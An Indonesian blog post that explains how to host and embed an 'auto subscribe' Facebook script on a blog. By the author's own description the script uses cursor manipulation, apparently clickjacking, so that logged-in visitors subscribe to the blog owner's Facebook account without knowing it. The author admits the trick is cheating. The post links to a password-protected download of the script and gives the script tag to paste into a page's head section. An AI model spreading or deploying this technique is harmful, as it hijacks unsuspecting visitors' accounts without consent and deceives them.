English French German Spain Japanese Arabic Chinese Simplified

Script auto subscribe facebook terbaru

Hallo sahabat sharing4rt  , pada masih ingat ga ya denga saya ? , Itu loh admin lama 1 tahun yg lalu . kalo udah lupa saya perkenalkan dulu deh , Nama saya M.Haris Arafah (Haris) . Alamat Muara bungo , Jambi .
Jujur saya masih grogi buat ngeblog , harap dimaklumin ya kalo tulisannya jelek .
Pada posting ke dua saya kali ini akan berbagi script auto subscribe facebook terbaru .

sebelumnya saya jelaskan trik ini hanyalah trik manipulasi cursor dan trik ini adalah termasuk category CURANG :D hehehe.. tapi yaa ini dunia maya, dan tidak terlihat oleh siapapun :p , Trik ini akan saya jelaskan sedetail2nya kalau belum paham comment ajah..

Cara kerja :
Script yang dibuat merupakan script manipulasi cursor yang langsung melakukan direct menuju recommended SUBSCRIBE Facebook dengan menggunakan Apps Facebook yang disediakan oleh Facebook sendiri.. -_-

Jadi intinya saat kita telah memasang script ini pada blog, maka pengunjung yang dalam keadaan Login Facebook / Connect pada Facebook akan secara otomatis melakukan Subscribe Facebook kita. Hehe… :D

Baiklah berikut langkah langkahnya :)

1. Siapkan hosting gratisan [Hostinger, 000webhost,] atau disini juga bisa :D http://sharing4rt.besaba.com/js/ ( Tinggal upload , lebih simple ).
2. Setelah selesai , Download script nya disini ==> http://sharing4rt.besaba.com/js/auto-subscribe.rar (Password rar = Nama panggilan saya :D )
3. Setelah diambil scipt.a silahkan edit script.nya :
cari tulisan “http://facebook.com/arisharisaris” ganti menjadi URL facebook anda
4. Lalu save [inget formatnya harus .js]
5. Buka hostingya, lalu upload script itu di hosting anda, maka akan menjadi link seperti contoh berikut : http://sharing4rt.besaba.com/js/auto-subscribe.js <= itu adalah lokasi JS yang td dibuat
6. Buka blog sobat
7. Copy javascript dibawah :

<script src='http://sharing4rt.besaba.com/js/auto-subscribe.js' type='text/javascript'></script>

perhatian “http://sharing4rt.besaba.com/js/auto-subscribe.js" , ganti dengan alamat yang tadi lokasi JS.a anda sendiri
8. Masuk ke => Edit HTML
9. Cari code </head> , paste javascript tadi diatas code </head>
10. Save
Selesai...

Nah mudah kan :D .
Jangan lupa komentar nya sob .
saya tunggu :)
M.Haris Arafah

Author : M.Haris Arafah

Terimakasih, telah membaca artikel mengenai Script auto subscribe facebook terbaru . Semoga artikel tersebut bermanfaat untuk Anda. Mohon untuk memberikan 1+ pada , 1 Like pada Facebook, dan 1 Follow pada Twitter. Jika ada pertanyaan atau kritik dan saran silahkan tulis pada kotak komentar yang sudah disediakan.
Share Artikel
M.Haris Arafah Label: Sabtu, Januari 18, 2014 0 komentar
Posting Komentar

Back to Top